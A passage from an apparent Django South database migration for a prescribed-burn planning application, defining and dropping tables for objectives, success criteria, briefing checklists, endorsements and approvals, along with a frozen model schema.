('fma_names', self.gf('django.db.models.fields.TextField')(blank=True)),
('objectives', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'prescription', ['RegionalObjective'])
# Adding model 'Objective'
db.create_table(u'prescription_objective', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_objective_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_objective_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('objectives', self.gf('django.db.models.fields.TextField')()),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
))
db.send_create_signal(u'prescription', ['Objective'])
# Adding model 'SuccessCriteria'
db.create_table(u'prescription_successcriteria', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_successcriteria_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_successcriteria_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('criteria', self.gf('django.db.models.fields.TextField')()),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
))
db.send_create_signal(u'prescription', ['SuccessCriteria'])
# Adding M2M table for field objectives on 'SuccessCriteria'
db.create_table(u'prescription_successcriteria_objectives', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('successcriteria', models.ForeignKey(orm[u'prescription.successcriteria'], null=False)),
('objective', models.ForeignKey(orm[u'prescription.objective'], null=False))
))
db.create_unique(u'prescription_successcriteria_objectives', ['successcriteria_id', 'objective_id'])
# Adding model 'SMEAC'
db.create_table(u'prescription_smeac', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('category', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['SMEAC'])
# Adding model 'DefaultBriefingChecklist'
db.create_table(u'prescription_defaultbriefingchecklist', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('smeac', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.SMEAC'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['DefaultBriefingChecklist'])
# Adding model 'BriefingChecklist'
db.create_table(u'prescription_briefingchecklist', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_briefingchecklist_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_briefingchecklist_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
('smeac', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.SMEAC'])),
('notes', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'prescription', ['BriefingChecklist'])
# Adding model 'Endorsement'
db.create_table(u'prescription_endorsement', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_endorsement_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_endorsement_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
('role', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.EndorsingRole'])),
('endorsed', self.gf('django.db.models.fields.NullBooleanField')(default=None, null=True, blank=True)),
))
db.send_create_signal(u'prescription', ['Endorsement'])
# Adding model 'Approval'
db.create_table(u'prescription_approval', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_approval_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_approval_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
('initial_valid_to', self.gf('django.db.models.fields.DateField')(default=datetime.datetime.now)),
('valid_to', self.gf('django.db.models.fields.DateField')(default=datetime.datetime.now)),
('extension_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
))
db.send_create_signal(u'prescription', ['Approval'])
def backwards(self, orm):
# Removing unique constraint on 'PriorityJustification', fields ['purpose', 'prescription']
db.delete_unique(u'prescription_priorityjustification', ['purpose_id', 'prescription_id'])
# Removing unique constraint on 'Shire', fields ['name', 'district']
db.delete_unique(u'prescription_shire', ['name', 'district_id'])
# Deleting model 'Season'
db.delete_table(u'prescription_season')
# Deleting model 'Region'
db.delete_table(u'prescription_region')
# Deleting model 'District'
db.delete_table(u'prescription_district')
# Deleting model 'Shire'
db.delete_table(u'prescription_shire')
# Deleting model 'VegetationType'
db.delete_table(u'prescription_vegetationtype')
# Deleting model 'Tenure'
db.delete_table(u'prescription_tenure')
# Deleting model 'Purpose'
db.delete_table(u'prescription_purpose')
# Deleting model 'ForecastArea'
db.delete_table(u'prescription_forecastarea')
# Removing M2M table for field districts on 'ForecastArea'
db.delete_table('prescription_forecastarea_districts')
# Deleting model 'EndorsingRole'
db.delete_table(u'prescription_endorsingrole')
# Deleting model 'Prescription'
db.delete_table(u'prescription_prescription')
# Removing M2M table for field shires on 'Prescription'
db.delete_table('prescription_prescription_shires')
# Removing M2M table for field regional_objectives on 'Prescription'
db.delete_table('prescription_prescription_regional_objectives')
# Removing M2M table for field vegetation_types on 'Prescription'
db.delete_table('prescription_prescription_vegetation_types')
# Removing M2M table for field tenures on 'Prescription'
db.delete_table('prescription_prescription_tenures')
# Removing M2M table for field forecast_areas on 'Prescription'
db.delete_table('prescription_prescription_forecast_areas')
# Removing M2M table for field purposes on 'Prescription'
db.delete_table('prescription_prescription_purposes')
# Removing M2M table for field endorsing_roles on 'Prescription'
db.delete_table('prescription_prescription_endorsing_roles')
# Removing M2M table for field critical_stakeholders on 'Prescription'
db.delete_table('prescription_prescription_critical_stakeholders')
# Deleting model 'PriorityJustification'
db.delete_table(u'prescription_priorityjustification')
# Deleting model 'RegionalObjective'
db.delete_table(u'prescription_regionalobjective')
# Deleting model 'Objective'
db.delete_table(u'prescription_objective')
# Deleting model 'SuccessCriteria'
db.delete_table(u'prescription_successcriteria')
# Removing M2M table for field objectives on 'SuccessCriteria'
db.delete_table('prescription_successcriteria_objectives')
# Deleting model 'SMEAC'
db.delete_table(u'prescription_smeac')
# Deleting model 'DefaultBriefingChecklist'
db.delete_table(u'prescription_defaultbriefingchecklist')
# Deleting model 'BriefingChecklist'
db.delete_table(u'prescription_briefingchecklist')
# Deleting model 'Endorsement'
db.delete_table(u'prescription_endorsement')
# Deleting model 'Approval'
db.delete_table(u'prescription_approval')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'prescription.approval': {
'Meta': {'ordering': "[u'-id']", 'object_name': 'Approval'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_approval_created'", 'to': u"orm['auth.User']"}),
'extension_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_valid_to': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_approval_modified'", 'to': u"orm['auth.User']"}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'valid_to': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'})
},
u'prescription.briefingchecklist': {
'Meta': {'ordering': "[u'smeac__id', u'id']", 'object_name': 'BriefingChecklist'},
'action': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['risk.Action']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_briefingchecklist_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_briefingchecklist_modified'", 'to': u"orm['auth.User']"}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'smeac': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.SMEAC']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.defaultbriefingchecklist': {
'Meta': {'object_name': 'DefaultBriefingChecklist'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'smeac': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.SMEAC']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.district': {
'Meta': {'ordering': "[u'name']", 'object_name': 'District'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Region']"})
},
u'prescription.endorsement': {
'Meta': {'object_name': 'Endorsement'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_endorsement_created'", 'to': u"orm['auth.User']"}),
'endorsed': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_endorsement_modified'", 'to': u"orm['auth.User']"}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.EndorsingRole']"})
},
u'prescription.endorsingrole': {
'Meta': {'ordering': "[u'name']", 'object_name': 'EndorsingRole'},
'disclaimer': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '320'})
},
u'prescription.forecastarea': {
'Meta': {'ordering': "[u'name']", 'object_name': 'ForecastArea'},
'districts': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.District']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.objective': {
'Meta': {'ordering': "[u'created']", 'object_name': 'Objective'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_objective_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_objective_modified'", 'to': u"orm['auth.User']"}),
'objectives': ('django.db.models.fields.TextField', [], {}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"})
},
u'prescription.prescription': {
'Meta': {'object_name': 'Prescription'},
'aircraft_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'allocation': ('django.db.models.fields.PositiveSmallIntegerField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'approval_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'approval_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'area': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '12', 'decimal_places': '1'}),
'biodiversity_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'biodiversity_text_additional': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'burn_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'bushfire_act_zone': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'bushfire_risk_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'contentious': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'contentious_rationale': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_prescription_created'", 'to': u"orm['auth.User']"}),
'critical_stakeholders': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'prescriptions_critical'", 'symmetrical': 'False', 'to': u"orm['stakeholder.CriticalStakeholder']"}),
'district': ('smart_selects.db_fields.ChainedForeignKey', [], {'to': u"orm['prescription.District']", 'null': 'True', 'blank': 'True'}),
'endorsement_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'endorsement_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'endorsing_roles': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.EndorsingRole']", 'symmetrical': 'False'}),
'endorsing_roles_determined': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'forecast_areas': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.ForecastArea']", 'null': 'True', 'blank': 'True'}),
'forest_blocks': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignition_completed_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'ignition_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'ignition_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'last_season': ('django.db.models.fields.PositiveSmallIntegerField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'last_season_unknown': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_year': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'last_year_unknown': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': "u'320'", 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_prescription_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'perimeter': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '12', 'decimal_places': '1'}),
'planned_season': ('django.db.models.fields.PositiveSmallIntegerField', [], {'max_length': '64'}),
'planned_year': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '4'}),
'planning_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'planning_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'prescribing_officer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'prohibited_period': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'public_contacts': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'prescriptions_public_contact'", 'symmetrical': 'False', 'through': u"orm['stakeholder.PublicContact']", 'to': u"orm['stakeholder.Stakeholder']"}),
'purposes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.Purpose']", 'symmetrical': 'False'}),
'rationale': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Region']"}),
'regional_objectives': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.RegionalObjective']", 'null': 'True', 'blank': 'True'}),
'remote_sensing_priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '4'}),
'shires': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.Shire']", 'null': 'True', 'blank': 'True'}),
'short_code': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'tenures': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.Tenure']", 'symmetrical': 'False', 'blank': 'True'}),
'treatment_percentage': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'vegetation_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'vegetation_types': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.VegetationType']", 'null': 'True', 'blank': 'True'})
},
u'prescription.priorityjustification': {
'Meta': {'ordering': "[u'order']", 'unique_together': "((u'purpose', u'prescription'),)", 'object_name': 'PriorityJustification'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_priorityjustification_created'", 'to': u"orm['auth.User']"}),
'criteria': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_priorityjustification_modified'", 'to': u"orm['auth.User']"}),
'order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']", 'null': 'True'}),
'priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'purpose': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Purpose']"}),
'rationale': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'relevant': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'prescription.purpose': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Purpose'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.region': {
'Meta': {'object_name': 'Region'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
u'prescription.regionalobjective': {
'Meta': {'object_name': 'RegionalObjective'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_regionalobjective_created'", 'to': u"orm['auth.User']"}),
'fma_names': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impact': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_regionalobjective_modified'", 'to': u"orm['auth.User']"}),
'objectives': ('django.db.models.fields.TextField', [], {}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Region']"})
},
u'prescription.season': {
'Meta': {'ordering': "[u'-start']", 'object_name': 'Season'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_season_created'", 'to': u"orm['auth.User']"}),
'end': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_season_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '3'}),
'start': ('django.db.models.fields.DateField', [], {})
},
u'prescription.shire': {
'Meta': {'ordering': "[u'name']", 'unique_together': "((u'name', u'district'),)", 'object_name': 'Shire'},
'district': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.District']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.smeac': {
'Meta': {'object_name': 'SMEAC'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'prescription.successcriteria': {
'Meta': {'ordering': "[u'created']", 'object_name': 'SuccessCriteria'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_successcriteria_created'", 'to': u"orm['auth.User']"}),
'criteria': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_successcriteria_modified'", 'to': u"orm['auth.User']"}),
'objectives': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.Objective']", 'symmetrical': 'False'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"})
},
u'prescription.tenure': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Tenure'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.vegetationtype': {
'Meta': {'ordering': "[u'name']", 'object_name': 'VegetationType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'risk.action': {
'Meta': {'ordering': "[u'risk__category', u'-relevant', u'risk__name', u'pk']", 'object_name': 'Action'},
'context_statement': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_action_created'", 'to': u"orm['auth.User']"}),
'day_of_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_administration': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_command': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'day_of_burn_completer': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'day_of_burn_execution': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_include': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_mission': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_situation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_action_modified'", 'to': u"orm['auth.User']"}),
'post_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'post_burn_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'post_burn_completer': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'pre_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'pre_burn_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'pre_burn_completer': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'pre_burn_explanation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'pre_burn_resolved': ('django.db.models.fields.CharField', [], {'default': "u'No'", 'max_length': '200', 'blank': 'True'}),
'relevant': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'risk': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['risk.Risk']"}),
'total': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'})
},
u'risk.risk': {
'Meta': {'ordering': "[u'category', u'name']", 'object_name': 'Risk'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['risk.RiskCategory']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_risk_created'", 'to': u"orm['auth.User']"}),
'custom': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_risk_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
